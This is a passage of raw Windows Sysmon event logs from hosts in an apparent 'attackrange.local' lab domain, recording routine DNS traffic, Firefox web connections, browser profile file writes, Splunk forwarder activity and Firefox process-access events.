07:58:43.510{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59304- 354300x8000000000000000105992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.480{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51816-false151.101.129.69-443https 354300x8000000000000000105991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.479{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64206- 354300x8000000000000000105990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.478{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59907- 354300x8000000000000000105989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.475{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61522- 23542300x8000000000000000105988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.401{58E9C193-B426-615A-0802-00000000FC01}1112ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41MD5=D910AD167F0217587501FDCDB33CC544,SHA256=E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.412{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-56458-true2001:500:2f:0:0:0:0:ff.root-servers.net53domain 354300x8000000000000000105986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.375{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51815-false10.0.1.12-8000- 354300x8000000000000000105985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.319{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local52395-false74.125.206.157wk-in-f157.1e100.net443https 354300x8000000000000000105984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.306{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local52394-false142.250.185.193fra16s52-in-f1.1e100.net443https 354300x8000000000000000105983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.285{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51813-false74.125.206.157wk-in-f157.1e100.net443https 354300x8000000000000000105982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.276{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51814-false142.250.185.193fra16s52-in-f1.1e100.net443https 354300x8000000000000000105981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.275{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52393- 354300x8000000000000000105980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.275{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52890- 354300x8000000000000000105979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.262{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64040- 10341000x8000000000000000105978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.111{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082896Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:45.844{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA95099711310150D2603561C54B30E,SHA256=CECE0FB5D42B424233F289D5AF9AAACD3D5FDA48F637C4C57CF3DE0E79A1D1F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.964{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-walMD5=BBF1A5622145F91D925778D5D7534B3C,SHA256=553065AB3D61F2C239F41B9AD31F0F7D807D3DF09235601C04BC516405DB61DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.962{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-shmMD5=6D8BE0795C6A639B8D4D1ED1AA92FADA,SHA256=C8B84FA2836DAEBE2C7BF187449D611D9F8AD82F0401636CBAE0E6AFDE5C65C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.959{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=C9F578AD59425A3F0BCF95A4E4DA983A,SHA256=CE80E481A54888592459D072993A01849216B2DAEED3D307AF226AF4144BDEC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.209{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57979- 354300x8000000000000000106022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.185{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62425- 354300x8000000000000000106021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.184{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52396- 354300x8000000000000000106020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.184{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50029- 354300x8000000000000000106019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.184{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58957- 23542300x8000000000000000106018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.938{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=B95F06D2BBD34AFEFB9726A855D8E6B4,SHA256=68664EE200E511A764B8A63B96ADC0F736FD75E65AC45F6AD41355471F636511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.930{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=157DBD1DC6835AAED945A336B6B3FDA1,SHA256=F2455C900F0F6CF951E1383099B17A8E5B2E246ED187F9E381A6EED4A012304C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.922{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=18C9C58A8C7B710BB46BB4A60ED3B348,SHA256=A315FC1AB5C3753A6327FF4C99AC2CE4A88D309456F7CB6AB74627D40B1FB4BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5694A94AB61B8AC0798AE72D0DD401E8,SHA256=028587B07F1875904BA7EE81D765A5F151B16B8DA66AEABDF01A92466EFFF44C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.245{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=CF5038EA2CC1BC00627B69601E6B58FB,SHA256=9EAAC6D442739EBF1DB7AECC023AC4198F1CE89DEE0DEA11B0095FA57027EAA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.245{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=E5E92BF056799A59D6654BE1B9439EB3,SHA256=DF4BCCB5E867F40775D2258983FB96FCBA2D6B1248DC641C398E90CE027EDE5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:45.240{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=8E36F351061FC8BFDF28C5A98A69BAF5,SHA256=888F5451BD8BE9A0DD5A7511EE146EDF61FF348B164A1CA3AF3698F7920DC8CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:46.273{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\permissions.sqlite-journalMD5=8E0CD1C8EB85510CC7816F2FA74DEBDB,SHA256=A10A06E20DDA254E2B293ED27050D52E4D8CD75E4EF75ECBAC31E560970E3620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:46.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EB42FCE4DD718097F6C7DDDB9F7F4D,SHA256=E1FDE4C0A7A5E2015CC9368C4A404766C9F15382EAFEC380B8BF65D93BBF25C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.791{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.791{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.503{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-walMD5=F775BA3BB07D5F05DC35910DF67EF499,SHA256=2295FB3B035D717EDC1B14B2BB169E5C732E9AD10262CD21410843C7D0BF968A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.501{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-shmMD5=BAE3E345200CFF74552168AB9FDC667F,SHA256=CBEE118378724BD8E130BF0FC953AE04A7587A5677A8F73D7CC7A5597FA36E34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.495{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++stackoverflow.com\ls\data.sqlite-journalMD5=FCCC5D23B199E5336BBAEC4E8C3ACC9E,SHA256=261B1040C94D47008FAD90C46C06B006D1ED74AC4E70EBE286E5537B0F52CD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.477{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++stackoverflow.com\ls\data.sqlite-journalMD5=E9AB287CE0220EA2D6C61D979DB6CD23,SHA256=A5BE3A8BBD40E83C79CA3EBDAD378D0CD15D4812C858C9B4CDFAE8496A0FC07D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.468{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++stackoverflow.com\ls\data.sqlite-journalMD5=CE781F67B33AD4B090145E6F7F2860C9,SHA256=B78E680057751C642E1A099029FF264B28F3758CE5FDD6D6716F653DD5C8347B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.459{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\https+++stackoverflow.com\ls\data.sqlite-journalMD5=D524A98E62AF467441021F230CA63C4D,SHA256=B8953EC177B8693D6509A66759FCC5CB6D27CF01AD48812FA7B1051D827CEF2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.386{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 23542300x8000000000000000106040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.313{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52C33E68DCA10228EDAB948C066C270,SHA256=F71A580E54D1B12231ED15FBAA1A81F20843C2BD1FF5309EF50DBD9D18F18E6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082897Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:47.015{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=295BA4970AA1A7BA96518B36F0CF333B,SHA256=A8E6225D760E5E5BE984C26DFD6A4A1DAF93EE4EB68B8836460C15AE4F42EBA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.279{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.278{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.248{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.248{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.247{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:47.246{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program 